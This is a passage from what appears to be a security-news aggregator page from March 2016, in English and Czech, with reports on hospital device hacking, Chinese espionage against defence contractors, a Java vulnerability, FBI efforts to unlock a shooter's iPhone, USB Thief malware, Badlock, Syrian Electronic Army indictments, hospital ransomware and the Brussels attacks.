Brazilian attacks are evolving day-by-day, becoming more complex and efficient. It is there necessary to be wary of emails from unknown sources, especially those containing links and attached files.

Since the malicious payload hosted in the PNG file cannot be executed without its launcher, it cannot be used as the main infector; that is usually delivered to your mailbox, so it has to be installed by a different module.

This technique allows the criminals to successfully hide the binary inside a file that appears to be a PNG image. It also makes the analysis process harder for antivirus companies as well as bypassing the automated process to detect malicious files on hosting servers.

The files related to this attack are detected by Kaspersky Lab products as:

Trojan.Win32.KillAv.ovo
HEUR:Trojan.Win32.Generic
Trojan-Downloader.Win32.Banload.cxmj
Trojan-Downloader.Win32.Agent.hgpf
HEUR:Trojan-Downloader.Java.Generic


Hospitals are under attack in 2016

24.3.2016 Zdroj: Kaspersky Computer Attack

The year 2016 started with a quite a number of security incidents related to hacks of hospitals and medical equipment. They include a ransomware attack on a Los Angeles hospital, the same in two German hospitals, a case of researchers hacking a patient monitor and drug dispense system, an attack on a Melbourne hospital and so on – in just two months of 2016! This should be a real concern for the security industry.

This is not a surprise actually. The industry of Internet of things is on the rise; and, of course, the medical devices industry is one of the biggest concerns in terms of security. Modern medical devices are fully-functional computers that have an operating system and applications installed on them; and most of these devices have a communication channel to the Internet, external networks and different types of custom cloud base servers. These devices are full of sophisticated state-of-art technologies made for one goal – to help doctors treat their patients at the highest level possible. But like all other industrial systems, they are built with a focus on these technologies – to be precise, to be helpful in terms of medical science, but putting security aspects in second or even third place. And this is a quite a concern right now. Program design architecture vulnerabilities, unsecured authorization, unencrypted communication channels and finally critical bugs in software – all this leads to potential compromises.

Unauthorized access to these devices could have serious effects: it could lead not only to theft of personal data – important as it is – but it could directly affect the health, or even the lives, of the patients. Sometimes it’s really scary how simple it is to hack into the hospital, stealing personal information from a medical device or getting access to this device with the possibility of obtaining access to file system, user interface, etc. Imagine a scenario – one that could be called a truly “targeted attack” – whereby cybercriminals with full access to the medical infrastructure at a specific facility can manipulate the results of diagnosis or treatment systems. Because doctors in some cases will depend heavily on these sophisticated medical systems, such manipulation could result in the wrong treatment being given to a patient, worsening his or her medical condition.

In the research that I showed at the Kaspersky Security Analysts Summit, I presented an example of how easy it was to find a hospital, get access to its internal networks and finally gain a control of an MRI device – locating personal data about patients, their personal information, treatment procedures and then getting access to the MRI device file system. The problem is not only one of weak protection of medical equipment, it has a much wider scope – the whole IT infrastructure of modern hospitals is not properly organized and protected, and the problem persists worldwide.

Let’s see how cybercriminals could perform their attacks. I highlighted three major flaws that I see when speaking about proper protection of a medical facility:

First of all – exposure to the Internet with weak or even no authorization at all.

There are a number of ways to find vulnerable devices, for example using the Shodan search engine. Using proper requests to Shodan you can find thousands of medical devices exposed to the Internet: a hacker could discover MRI scanners, cardiology equipment, radioactive medical and other related equipment connected to the Internet. A lot of these devices still operate under the Windows XP OS and have dozens of old, unpatched vulnerabilities that could lead to the full compromise of a remote system. Moreover, in some cases these devices have unchanged default passwords that could easily be found in manuals published on the Internet.

 

Shodan search results

When I was performing my research and penetration testing on a real hospital, I found a few devices connected to Internet, but they were protected quite well: no default passwords, no vulnerabilities in web control interfaces, etc. But even if the facility is protected from the Internet-side, it won’t stop a cybercriminal from looking for other methods to break in if his goal is to get access no matter what.

And here’s the second flaw – devices are not protected from being accessed from local networks.

In my case I just drove to the hospital location and discovered a number of Wi-Fi access points belonging to the hospital. One of them had a weak Wi-Fi password that I was able to crack within two hours. With this password I was able to get access to the internal hospital network; and I found the same medical equipment I previously discovered on the Internet, but with one major difference – now I was able to connect to them because the local network was a trusted network for them. Manufacturers of medical devices, when creating a whole system, protect them from external access. But for some reason they thought that if someone tries to access them internally – it’s trusted by default. This is radically wrong – do not rely on local system administrators and how they organize the internal network protection of a hospital.

This is where the third flaw comes in – vulnerabilities in software architecture.

When I connected to a device and passed through the default login screen, I immediately got access to the control interface and personal data and diagnosis information about hospital patients. But this is not what attracted my attention. There was a command shell implemented in the user interface giving me access to the file system on the device.

 

Patient MRI result

In my opinion, it’s a major vulnerability in the application design – even if there was no remote access at all, why would software engineers take this opportunity to provide command shell access to the doctor’s interface? It definitely should not be there by default. This is what I was talking about at the beginning. You can provide good protection from one side, but you can completely fail to pay attention to others; and someone who is planning an attack will likely discover something like this and will compromise the whole device.

The other concern about application vulnerabilities is of course outdated versions of operating systems and patch management difficulties. This is a completely different environment from the standard IT infrastructure for PCs or mobile devices; you cannot simply release a patch for a vulnerability and then upload it to medical devices. It’s a complex manual process and in many cases a qualified engineer is needed on the hospital site to perform a system upgrade and to test that the devices are working properly after the update. That takes time and money, so it’s essential to create a protected system from the very beginning – at the development stage – with as few application vulnerabilities as possible.

The vendors of medical equipment and hospital IT teams should pay close attention to the topic of medical cyber-security; they are now on the list of valuable targets in the cybercriminal underground. We will see a growing number of attacks on medical facilities in the year ahead, including targeted attacks, ransomware infections, DDoS, and even attacks to physically damage medical devices. And finally, the industry has started to pay attention – for example the U.S. Food and Drug Administration (FDA) issued guidance outlining important steps medical device manufacturers should take to continually address cyber-security risks to keep patients safe and to better protect the public health.

 

I would like to give some recommendations to the local IT personnel working in hospitals:

Be aware that cybercriminals are now targeting medical facilities, read about these incidents and try to figure out if the attack methods could affect your own infrastructure.
Stick as close to the implemented IT security policies as possible, and develop timely patch management and vulnerability assessment policies as well.
Focus not only on protecting your infrastructure from outside threats such as malware and hacker attacks but also on maintaining strict control over what’s going on inside your local network, who has access to what, and any other things that could lead to local systems being compromised.


Chinese hacker admitted hacking US Defense contractors

24.3.2016 Hacking

A Chinese national pleaded guilty yesterday, March 23, on charges with hacking trade secrets from US defense contractors.
A Chinese national pleaded guilty yesterday, March 23, on charges with hacking trade secrets from US defense contractors. The man, Su Bin (also known as Stephen Su and Stephen Subin), 50, had been charged in a 2014 indictment with hacking into the computer networks of US defense contractors, including the Boing. The hackers aimed to steal blueprints and intellectual property for the F-22 and F-35 fighter jets and C-17 transport aircraft. In January 2015, Edward Snowden revealed China stole designs for the US-built F-35 Fighter jet hacking computer systems at US Defense contractors, and provides details also a counter-intelligence operation run by the NSA.

According to Snowden, the US Intelligence was aware that Chinese cyber spies have stolen “many terabytes of data” about the design of Australia’s Lockheed Martin F-35 Lightning II JSF. The details of the operation are described in a set of top secret documents published by the Der Spiegel magazine.

Chinese hackers have allegedly stolen as much as 50 terabytes of data from the US Defense contractors, including the details of the fighter’s radar systems, engine schematics, “aft deck heating contour maps,” designs to cool exhaust gasses and the method the jet uses to track targets.

The purpose of the Chinese Government is to acquire intellectual property on advanced technologies, benefiting Chinese companies on the market and narrowed the gap in the research of advanced technological solution. Military experts speculated that the stolen blueprints could help the country to develop a new generation of advanced aircraft fighter, so-called “fifth-generation” fighters.

In 2014, according to a US criminal complaint, computers of Boeing and other military contractors have been hacked to steal intellectual property and trade secrets on transport aircraft. The initial attacks against Boeing likely occurred between Jan 14th and March 20th, 2010. The complaint is dated June 27th and was disclosed on July 2015, it describes how the attackers have spied on Boeing computer networks for a year, and then have compromised systems of the principal US Defense contractors to steal intellectual property. According to the information disclosed, the hackers were mainly interested in the C-17 military transport.

The US law enforcement agencies accused Su Bin, a Chinese businessman residing in Canada, of supporting two countrymen in the organization of cyber attacks on Boeing systems to collect information about the C-17 and other military programs.

Chinese hacker admitted hacking US Defense contractors

The criminal complaint revealed that Su Bin with two unnamed co-conspirators, identified as UC1 and UC2, were collecting technical information related to components and performance of the C-17 transport and Lockheed Martin’s F-22 and F-35 fighter jets. During the period related the first attacks against Boeing, Su Bin was operating in the United States, as confirmed by FBI Special Agent Noel Neeman in the complaint.

Su Bin was arrested on June 2014 month in Canada, Neeman revealed that an email attachment sent by UC1 claims the Chinese hackers exfiltrated 65 gigabytes of data over a couple of years, including information on the C-17 transport from Boeing systems. The FBI agent collected evidence of data theft from Boeing systems, but there is no proof that the data that the stolen information was classified. The email provides also information related to the huge effort spent by hackers to compromise the Boeing system, the document details the architecture of the internal network of Boeing, which includes 18 domains, 10,000 PC and a “huge quantities” of defense appliances.

“Through painstaking labor and slow groping, we finally discovered C-17 strategic transport aircraft-related materials stored in the secret network,” the document says.

He was sent to the United States in February 2016.

The hackers described the difficulties to breach the system avoid detection system deployed by Boeing.

“From breaking into its internal network to obtaining intelligence, we repeatedly skipped around in its internal network to make it harder to detect reconnaissance, and we also skipped around at suitable times in countries outside the U.S. In the process of skipping, we were supported by a prodigious quantity of tools, routes and servers, which also ensured the smooth landing of intelligence data.” states the report.
The complaint did not provide any description on how hackers have stolen information about the Lockheed Martin jet fighters.

Another document issued by the FBI described the communications between UC1 and UC2, which states that the Chinese hackers successfully acquired information about US military project by establishing hot points in the U.S., France, Japan and Hong Kong. This last document, according to the complaint, reveals that the subjects have received about $1 million to build a team and infrastructure outside of China, the investigators are working to understand who has funded the entire operation.

Now in a plea agreement filed in a California federal court, Su admitted to conspiring with two unnamed persons in China from October 2008 to March 2014 to hack network of US contractors and steal “sensitive military information and to export that information illegally from the United States to China.”

The Court documents did not provide details on who operated the cyber espionage campaign, but security and intelligence experts believe that Su was working for the Chinese Government.

“Su Bin admitted to playing an important role in a conspiracy, originating in China, to illegally access sensitive military data, including data relating to military aircraft that are indispensable in keeping our military personnel safe,” said Assistant Attorney General John Carlin.

“This plea sends a strong message that stealing from the United States and our companies has a significant cost; we can and will find these criminals and bring them to justice.”

Sentencing was set for July 13, when Su faces a maximum penalty of five years in prison and a monetary fine of $250,000 or twice the gross gain from the offense.

The US government will issue a final ruling on the case on July 13. The Chinese man faces a maximum penalty of five years in prison and a monetary fine of $250,000 or twice the gross gain from the offense.


Patch Java immediately or attackers can hack you
24.3.2016 Vulnerebility

The CVE-2016-0636 flaw affects Java SE running in web browsers on desktops, attackers can trigger it remotely to takeover your PC.
Once again a serious security vulnerability affects the Java Oracle software, the new flaw coded as CVE-2016-0636 scored a 9.3 on the Common Vulnerability Scoring System bug severity rating.

The CVE-2016-0636 vulnerability affects Java SE running in web browsers on desktops, this means that an attacker could set up a malicious web page to remotely take over a vulnerable PC. The new vulnerability may be remotely exploitable without authentication.

Java_Bugs

“This vulnerability may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. To be successfully exploited, an unsuspecting user running an affected release in a browser will need to visit a malicious web page that leverages this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user’s system.” states the Oracle Security Alert for CVE-2016-0636.

“Oracle Java SE 7 Update 97, and 8 Update 73 and 74 for Windows, Solaris, Linux, and Mac OS X are affected.”

This vulnerability applies to Java deployments that load and run untrusted code coming from the internet. This vulnerability is not applicable to Java deployments that run only trusted code and does not affect Oracle server-based software.

Due to the high severity of this CVE-2016-0636 vulnerability and the public disclosure of technical details it is essential to upgrade the Java software as soon as possible.

“Due to the severity of this vulnerability and the public disclosure of technical details, Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.” states Oracle.

Releases installed by Windows users are automatically updated, Oracle released an update version of Java, Java SE 8u77.


Reset a poslání hesla v čitelné podobě e-mailem? Nebezpečná praktika

24.3.2016 Zdroj: Lupa.cz Ochrany

Používáte-li nějaký placený servis, kde osoba s přístupem ke službě může ovlivnit kolik platíte, chcete, aby služba byla bezpečná. To je jasné.
Pokud používáte služby mediálního monitoringu od Newton Media, tak jste se asi setkali s podivným zvykem. Zhruba tak jednou za měsíc vám přijde e-mailem nové heslo. Se zdůvodněním, že jde o bezpečnostní opatření, aby někdo nemohl heslo zneužít. Proto je heslo automaticky změněno a posláno zákazníkovi.

Je to velmi zvláštní a nebezpečná praktika, která má dva zásadní problémy. Jeden menší: zbytečné měnění hesla a tím neustálá nutnost někde nové heslo evidovat, aniž by bylo umožněno používat vlastní bezpečné heslo dle vlastního uvážení. Vynucované změny hesla obvykle vedou k tomu, že lidé používají hesla nebezpečná (protože si nové a nové složité heslo nedokážou zapamatovat) nebo si hesla samotná prostě věší na lístečky na monitor.

Ten větší a zásadnější problém je ale v posílání nového hesla v čitelné podobě e-mailem. E-mail není bezpečná forma komunikace a někdo ho může přečíst nejenom cestou, ale také se může dostat do cizí poštovní schránky, k cizímu mobilu, počítači či tabletu.

Velmi zvláštní přístup Newton Media jsme chtěli vysvětlit, včetně dotazu na to, jakým způsobem ukládají hesla zákazníků. Dotaz poslaný 7. března se dočkal odpovědi až 21. března po několika upomínkách. Kompletní odpověď:

ad 1) V nových aplikacích již není heslo ukládáno v systémech NEWTON Media vůbec. Úvodní náhodně generované heslo je zasláno klientovi, který si jej musí při prvním přihlášení změnit a v NEWTON Media je uložen pouze hash (otisk) tohoto hesla sloužící k ověření hesla zadaného uživatelem při následujících přihlášeních. Nové aplikace samozřejmě již komunikují pouze přes šifrovaný protokol HTTPS.

ad 2) Ve starších aplikacích NEWTON Media (např. MediaSearch) je volitelně ukládán buď kompletní text hesla, nebo také pouze hash. Volba závisí na přání klienta. V nejstarší aplikaci IMM je ukládán kompletní text hesla. V případě ukládání kompletního textu hesla je heslo šifrováno/dešifrováno aplikací, takže je uloženo v databázi v nečitelné podobě a tudíž ani administrátor databáze nemá možnost heslo číst.

Plyne z ní to, že pokud některý z produktů (aplikací) od Newton Media používáte, je možné, že vaše heslo je uloženo v plně čitelné podobě a má ho k dispozici kdokoliv, včetně případného útočníka, který získá přístup k databázím.

Po doplňujících otázkách také víme, že použitý hash je SHA algoritmus v .NET frameworku, doplněný o salt, také pomocí náhodného generátoru z .NET. Výše zmíněné resetování hesla se týká pouze starých aplikací a prý tato funkčnost byla „zavedena na četné žádosti zákazníků“.

Což přináší zásadní otázku: je skutečně dobré řídit se nebezpečnými nápady zákazníků? V nových aplikacích ale tato potenciálně nebezpečná funkčnost již není.


Takhle by mohli v FBI vydolovat data ze zašifrovaného iPhonu

24.3.2016 Zdroj: Zive.cz Mobilní

V kauze FBI vs. Apple došlo k odložení verdiktu, jelikož v FBI prý našli způsob jak odblokovat zašifrovaný iPhone útočníka Syeda Farooka. Jediná známá informace je, že s odemykáním telefonu by měla být nápomocná třetí strana. Žádné bližší informace neznáme, a to přináší prostor pro další spekulace.

Recode přináší vyjádření Jonathana Zdziarskeho (v hackerské komunitě známý spíše jako NerveGas). Hacker naznačuje, že jedním z možných způsobů, jak zabezpečení telefonu prolomit, je metoda „brute force“ – jednoduše vyzkoušet co nejvíce možných kombinací a najít správný kód.

16320-13026-iphone5c-guts-l.jpg
FBI by při hackování iPhonu 5C prý mohla použít metodu NAND mirroring

Má to ale jeden háček, telefon je chráněn proti opakovanému zadání chybného kódu a při několikátém pokusu se smažou veškerá data. Způsob jakým by se toto dalo obejít je dle Zdziarského NAND mirroring, tedy zkopírovat obsah flash paměti na externí médium. To vyžaduje vyjmutí paměťového čipu z telefonu a jeho připojení na čtečku.

Čip by poté byl vrácen zpět a pokud by se nepodařilo trefit číselnou kombinaci pro odemknutí telefonu, paměť by byla přehrána původní zálohou a pokus by se mohl opakovat. Jedinou překážkou je zde bezpečné vyjmutí čipu z telefonu. Při pokusu o vyjmutí by mohlo dojít k jejich poškození.


Israeli Cellebrite firm is helping FBI in cracking San Bernardino shooter’s iPhone
24.3.2016 Apple

The Israeli Cellebrite firm is helping the Federal Bureau of Investigation (FBI) in unlocking San Bernardino shooters’ iPhone.
In the last weeks, we have followed the case of the San Bernardino shooter’s iPhone that a few days ago reached an unexpected conclusion, the FBI announced on Monday to have found a way to unlock the mobile device without the Apple’s help.

The court filing doesn’t provide technical details on the technique, but confirmed that an independent party demonstrated to the US authorities a technique for unlocking the controversial iPhone.

“On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook’s iPhone,” revealed the lawyers for the US Government in a court filing Monday afternoon. “Testing is required to determine whether it is a viable method that will not compromise data on Farook’s iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case,”

Now the name of the company is circulating on the Internet, it is the Israeli mobile forensics firm Cellebrite that is one of the leading companies in the world in the field of digital forensics. The company already works with the principal law enforcement and intelligence agencies worldwide.

Cellebrite provides the FBI with decryption technology as part of a contract signed in 2013, its technology allows investigators to extract information from mobile devices.

“Cellebrite’s technology is able to extract valuable information from cellular devices that could be used in criminal and intelligence investigations, even if the phone and the information it contains are locked and secure.” states a blog post published on the Israeli YNetNews.

The website of the Cellebrite company confirms that its technology allows investigators to unlock Apple devices running iOS 8.x.
“Cellebrite’s Advanced Investigative Services (CAIS) offers global law enforcement agencies a breakthrough service to unlock Apple devices running iOS 8.x. This unique capability is the first of its kind – unlock of Apple devices running iOS 8.x in a forensically sound manner and without any hardware intervention or risk of device wipe.” reports the company website.“Cellebrite’s unlocking capability supports the following devices: iPhone 4S / 5 / 5C, iPad 2 / 3G / 4G,iPad mini 1G, and iPod touch 5G running iOS 8 – 8.0 / 8.0.1/ 8.0.2 / 8.1 / 8.1.1 / 8.1.2 / 8.1.3 / 8.2/ 8.3 / 8.4 / 8.4.1.”
One of its main solutions designed by the company is the Universal Forensic Extraction Device (UFED) that could be used to extract all data and passwords from mobile phones.

cellebrite ufed-touch

If Cellebrite will be able to crack the San Bernardino shooter’s iPhone, the FBI will no longer need the Apple’s help.

cellebrite ufed-touch

According to public documents, the FBI Feds committed to a $15,278 “action obligation” with Cellebrite.

At the time I was writing there were no details of the contract between the FBI and the Cellebrite firm.


Israeli Forensic Firm 'Cellebrite' is Helping FBI to Unlock Terrorist's iPhone
23.3.2016 Apple
Meet the security company that is helping Federal Bureau of Investigation (FBI) in unlocking San Bernardino shooters’ iPhone:
The Israeli mobile forensics firm Cellebrite.
Yes, Cellebrite – the provider of mobile forensic software from Israel – is helping the FBI in its attempt to unlock iPhone 5C that belonged to San Bernardino shooter, Syed Rizwan Farook, the Israeli YNetNews reported on Wednesday.
The company's website claims that its service allows investigators to unlock Apple devices running iOS 8.x "in a forensically sound manner and without any hardware intervention or risk of device wipe."
If Cellebrite succeeds in unlocking Farook’s iPhone, the FBI will no longer need Apple to create a backdoored version of its iOS operating system that could let it access data on Farook's locked iPhone 5C.
Apple is engaged in a legal encryption battle with the US Department of Justice (DoJ) over a court order that forces the company to write new software, which could disable passcode protection on Farook's iPhone 5C.
However, Apple is evident on its part, saying that the FBI wants the company to create effectively the "software equivalent of cancer" that would likely open up all iPhones to malicious hackers.
FBI Committed $15,278 "action obligation" with Cellebrite
The revelation comes just two days after the DoJ suspended the proceedings at least until next month. The FBI told a federal judge Monday that it need some time to test a possible method for unlocking the shooter's iPhone for which they have hired an "outside party".
According to public records, the same day the Feds committed to a $15,278 "action obligation" – the lowest amount the government has agreed to pay – with Cellebrite.
Many details of the contract are not yet available, and neither the FBI nor Cellebrite has officially commented on their contract publicly.
Watch Video: Here’s What Cellebrite Can Do

Founded in 1999, Cellebrite provides digital forensics tools and software for mobile phones. One of its main products is the Universal Forensic Extraction Device (UFED) that claims to help investigators extract all data and passwords from mobile phones.
For the company's hand on iOS devices, you can watch the 2015 YouTube video (above), demonstrating one of Cellebrite's products that unlocked the device in several hours.
Now the question is:
If the FBI found its iPhone backdoor that has the potential to affect hundreds of millions of Apple users…
Will the FBI report the flaw to Apple or keep it to itself? Let us know in the comments below.


Warning! Think Twice Before Using USB Drives
23.3.2016 Safety
Security researchers have discovered a new data-stealing Trojan that makes special use of USB devices in order to spread itself and does not leave any trace of activity on the compromised systems.
Dubbed USB Thief ( or Win32/PSW.Stealer.NAI), the malware has the capability of stealthy attacking against air-gapped or isolated computers, warns ESET security firm.
The malware author has employed special programs to protect the USB Thief from being reproduced or copied, making it even harder to detect and reverse-engineer.
USB Thief has been designed for targeted attacks on computer systems that are isolated from the Internet, according to the ESET malware analyst Tomáš Gardoň.
The 'USB Thief' Trojan Malware
The USB Thief Trojan malware is stored either as a portable application's plugin source or as a Dynamically Linked Library (DLL) used by the portable application.
Since USB devices often store popular applications like Firefox, Notepad++ or TrueCrypt portable, once any of these applications is executed, the malware starts running in the background.
USB Thief is capable of stealing data from air-gapped systems – systems that are isolated from the Internet and other external networks.
"Well, taking into account that organizations isolate some of their systems for a good reason," explained Peter Stancik, the security evangelist at ESET. "Any tool capable of attacking these so called air-gapped systems must be regarded as dangerous."
The malware runs from a USB removable device, so it don’t leave any traces of its activities, and thus, victims do not even notice that their data had been stolen.
Since the malware is bound to a single USB device, it prevents USB Thief from leaking from the infected computers.
Besides this, USB Thief utilizes a sophisticated implementation of multi-staged encryption that makes the malware harder to detect and analyse.
"This is not a very common way to trick users, but very dangerous," Stancik said. "People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy."
Here's How you can Protect from being Infected:
Do not use USB storage devices from non-trustworthy sources.
Turn off Autorun
Regularly backup your data
More technical details are available on ESET Ireland’s
official blog.


Badlock — Unpatched Windows-Samba Vulnerability Affects All Versions of Windows
23.3.2016 Vulnerebility
Security researchers have discovered a nasty security vulnerability that is said to affect almost every version of Windows and Samba and will be patched on April 12, 2016, the Samba development team announced Tuesday.
So, Save the Date if you are a Windows or Samba file server administrator.
Samba is a free, open source implementation of the SMB/CIFS network file sharing protocol that runs on the majority of operating systems available today, including Windows, UNIX, Linux, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to communicate with the same networking protocol as the Windows products, thus enabling users to access network shared folders and files from Windows OS.
Dubbed Badlock, the vulnerability has been discovered by Stefan Metzmacher, a developer of Samba Core Team.
Details about the Badlock vulnerability will be disclosed on April 12, when the developers of Microsoft and Samba release security patches to fix the flaw.
With a proper name, website and even logo, Badlock seems to be another marketed vulnerability that will likely be exploited by hackers once its details become public.
Here's what Badlock.org website reads:
On April 12th, 2016 a crucial security bug in Windows and Samba will be disclosed. We call it: Badlock. Engineers at Microsoft and the Samba Team are working together to get this problem fixed. Patches will be released on April 12th.
Admins and all of you responsible for Windows or Samba server infrastructure: Mark the date. (Again: It's April 12th, 2016.) Please get yourself ready to patch all systems on this day. We are pretty sure that there will be exploits soon after we publish all relevant information.
Although this sort of pre-notification is appreciated, especially for system administrators to help them apply the patch as soon as possible, the security blunder could also benefit the bad guys.
Security experts also believe that the available information might be enough for malicious hackers to independently find Badlock and exploit the vulnerability before a patch is released.


Three Syrian Electronic Army Hackers are in the FBI Most Wanted
23.3.2016 Crime

Three members of the Syrian Electronic Army hacker crew have been inserted by the US authorities in the list of most wanted criminals.
The Syrian Electronic Army, aka SEA, is considered one of most dreaded hacking crew that first appeared in 2011. According to the report “Syrian Electronic Army – Hacktivision to Cyber Espionage?,” published in 2014, in the beginning, the Syrian Electronic Army was mainly politically motivated, members of the collective hacked to spread political messages pro Syrian President Bashar Al-Assad.

But over time, the group has increased its popularity, targeting principal enterprises like Microsoft and Twitter, and media agencies like The New York Times, Reuters, the Associated Press, E! Online, Time, CNN, The Washington Post, The Daily Dot, Vice, Human Rights Watch, Harvard University, NASA and The Onion.

The list of victims of the Syrian Electronic Army also includes the US CENTCOM and the White House.

As revealed by the reports the “SEA has evolved into the realm of global espionage, where some of their targets are “C” level executives at technology and media companies, allied military procurement officers, United States defense contractors, and foreign attaches and embassies.”

Now three members of the Syrian Electronic Army were inserted by the FBI in the FBI Most Wanted List, they are:

Ahmad Umar Agha (aka The Pro), 22
Firas Dardar (aka The Shadow), 27
Peter Romar, 36
The three alleged members of the hacker collective are thought to be actually resident in Syria, it is impossible to arrest them over there.

The US Department of Justice and the Federal Bureau of Investigation (FBI) are willing to pay $100,000 reward for any information that leads to the capture of the alleged leaders of the Syrian Electronic Army.

Agha and Dardar have been added to the FBI’s Most Wanted list.

syrian electronic army FBI most wanted

The authorities believe that Ahmad Umar Agha and Firas Dardar were involved in the hacking of the Twitter Account of the Associated Press in April 2013, the hackers spread fake news of a cyber attack against the White House that had a serious effect on the stock market.

The hackers were involved in numerous hacking and propaganda campaigns from 2011 to 2013.
“According to allegations in the first complaint, beginning in or around 2011, Agha and Dardar engaged in a multi-year criminal conspiracy under the name “Syrian Electronic Army” in support of the Syrian Government and President Bashar al-Assad. ” reads the US Department of Justice (DoJ) statement .

“The conspiracy was dedicated to spear-phishing and compromising the computer systems of the US government, as well as international organizations, media organizations and other private-sector entities that the SEA deemed as having been antagonistic toward the Syrian Government”

The FBI tracked the hackers online, in particular, the authorities obtained court orders to search their online accounts on Gmail and Facebook platforms. The hackers, in fact, used the popular services to communicate and exchange the stolen data.

The charges for Agha and Dardar are each charged with multiple conspiracies related to computer hacking including:

Engaging in a hoax regarding a terrorist attack
Attempting to cause mutiny of the US armed forces
Access device fraud
Illicit of authentication features
Unlawful access to stored communications
Unauthorized access to, and damage of, computers
Dardar and Pierre Romar, are separately charged with conspiracies related to:

Unauthorized access to, and damage of, computers
Receiving the proceeds of extortion
Money laundering
Wire fraud
Violations of the Syrian Sanctions Regulations
Nation-state hacking or cybercrime?

This is the position of the U.S. Assistant Director Trainor.

“Cybercriminals cause significant damage and disruption around the world, often under the veil of anonymity,” said Assistant Director Trainor. “As this case shows, we will continue to work closely with our partners to identify these individuals and bring them to justice, regardless of where they are.”

“These three members of the Syrian Electronic Army targeted and compromised computer systems in order to provide support to the Assad regime as well as for their own personal monetary gain through extortion,” said Assistant Director in Charge Abbate. “As a result of a thorough cyber investigation, FBI agents and analysts identified the perpetrators and now continue to work with our domestic and international partners to ensure these individuals face justice in the United States. I want to thank the dedicated FBI personnel, federal prosecutors, and our law enforcement partners for their tremendous efforts to ensure on-line criminal activity is countered, U.S. cyber infrastructure is safeguarded, and violators are held accountable under the law.”

“The tireless efforts of U.S. prosecutors and our investigative partners have allowed us to identify individuals who have been responsible for inflicting damage on U.S. government and private entities through computer intrusions,” said U.S. Attorney Boente. “Today’s announcement demonstrates that we will continue to pursue these individuals no matter where they are in the world.”

All of the three alleged members are thought to be resident in Syria. The United States government is inviting tip-offs.


The FBI is investigating ransomware-based attack at Methodist Hospital
23.3.2016 Virus

The FBI is investigating cyber-attack at Methodist Hospital in Henderson, once again a ransomware hit a critical infrastructure.
Ransomware is one of the most dangerous cyber threats for businesses and government organizations, the number of infections worldwide is in constant increase. Recently I reported the discovery in the wild of the a new variant of the TeslaCrypt, meanwhile security firms are warning on a spike in the number of attacks bases on the Locky malware.

What happen when ransomware hits a critical infrastructure?

The impact could be serious, in the last months, a ransomware hit Israeli Public Utility Authority with a severe impact on its operations, meanwhile several attacks hit computer systems of hospitals in the US and Germany.

In February, two German hospitals were infected by a ransomware, in a similar way occurred recently at the US Hollywood Presbyterian Medical Center. The Los Angeles hospital paid about $17,000 to the crooks for restoring patients’ files.

News of the day, the systems at another US hospital have been infected by ransomware, it is the Methodist Hospital in Kentucky that’s been infected.

According to NewsChannel10, the Methodist Hospital in Henderson was hit my a ransomware that locked patients’ files and is demanding money for to regain access to them. Officials say that the hospital paid about $17,000 to those hackers for the access back to the patients’ files.

“In the past, we haven’t seen crimes in such a large scale like Methodist,” said KSP trooper Shane Settle. “In general, the more a criminal commits a crime, the more confident they get, especially if they get away with it. I think that’s what you’re seeing here is they are shooting for a much larger target and more money.”

“We’ve notified the FBI, we’re dealing with federal authorities on how to deal with it,” said David Park, Methodist Hospital COO. “Depending upon the number of records that were locked, depends upon whether we’re going to consider looking into whether we pay anything or not.”

The ransomware copies the patients’ files, encrypted them and then the deleted the originals. The good news is that the IT staff at the Methodist Hospital in Henderson has updated backups, this drastically limits the effects of the ransomware on the infrastructure.

In a press release, Methodist Hospital officials reassured patients their information is secure, the hospital is currently working with a backup infrastructure while the internal staff is sanitizing the systems

ransomware hit Methodist Hospital Henderson

We must expect similar attacks in the next future, medical data are a precious commodity in the underground.

According to The Ponemon Institute’s 2015 Global Cost of Data Breach Study, the health care industry suffered the highest costs that were estimated at an average of $363 per record, a data that doesn’t surprise the experts due to the higher value of medical records respect credit card data.

Methodist Hospital - ponemon institute cost data breach 2015 2

A set of complete health insurance credentials sold for $20 on the underground markets in 2013 — 10 to 20 times the price of a U.S. credit card number with a security code, according to Dell.

Caleb Barlow, vice president at IBM Security, explained that data in a medical record have a much longer shelf life than that of a credit card number.

“With credit cards, the time frame from the breach to mitigation is very short,” Barlow explained. “But the health care record can be used to establish access in perpetuity,” “it can be used to establish credit or steal your identity ten or fifteen years from now,” he added. “Once this information is out there, you can’t get the genie back in the bottle.”


UPDATED – Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro
23.3.2016 Crime

Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro, it is a terror attack. Panic and chaos in the city. The IS claims the responsibility for the attack.
This morning the Europe has fallen again in terror, just months after the Paris attacks a new wave of attacks hit the West. This morning a sequence of explosions have been detonated at Brussels Airport in an alleged suicide bomber terror attack.
“We can confirm that there have been two explosions in the departure hall. We called the emergency services on the ground – they [are] now provid[ing] first aid to the injured.” said Anke Fransen, spokeswoman for the Brussels Airport.

The first two Brussels explosions have hit the departure hall at the international Zaventem airport shortly before 8am, next to the American Airlines check-in desk. Other explosions have been detonated at the Schuman and Malbeek metro station, not far from the EU headquarters. The explosions at a metro station in Maalbeek occurred one hour later.

Brussels explosions maps
Source FT.com

A government source confirmed to VRT broadcaster that it was a terror attack, the number of victims is increasing minute after minute, last news reports at least 34 dead and hundreds people injured.

“A Belgian news agency is reporting that shots were fired and words in Arabic were heard being shouted before the blasts.” reported the British Mirror.

Brussels explosions
Source FT.comr.

Local authorities are inviting people to not come near the area under attack.

Brussels Airport’s Twitter account told followers: “There have been 2 explosions at the airport.

Local media reported that as many as 14 people were killed at the airport, with hundreds injured, and 20 killed at the metro station. These numbers are not official and must be confirmed by the authorities.

The Brussels explosions come only a day after the Belgium’s interior minister, Jan Jambon, warned possible terror attacks after the recent arrest Salah Abdeslam, one of the participants of the Paris terror attacks.

My thoughts are with the people of Brussels following these ignoble attacks.

From a cyber security perspective, I invite all to remain vigilant, crooks will try to exploit the media attention on the Brussels explosions sharing bogus videos and malicious link. It is likely we will detect a phishing campaign trying to exploit the event.

Pierluigi Paganini

(Security Affairs – Brussels explosions, terror attack)

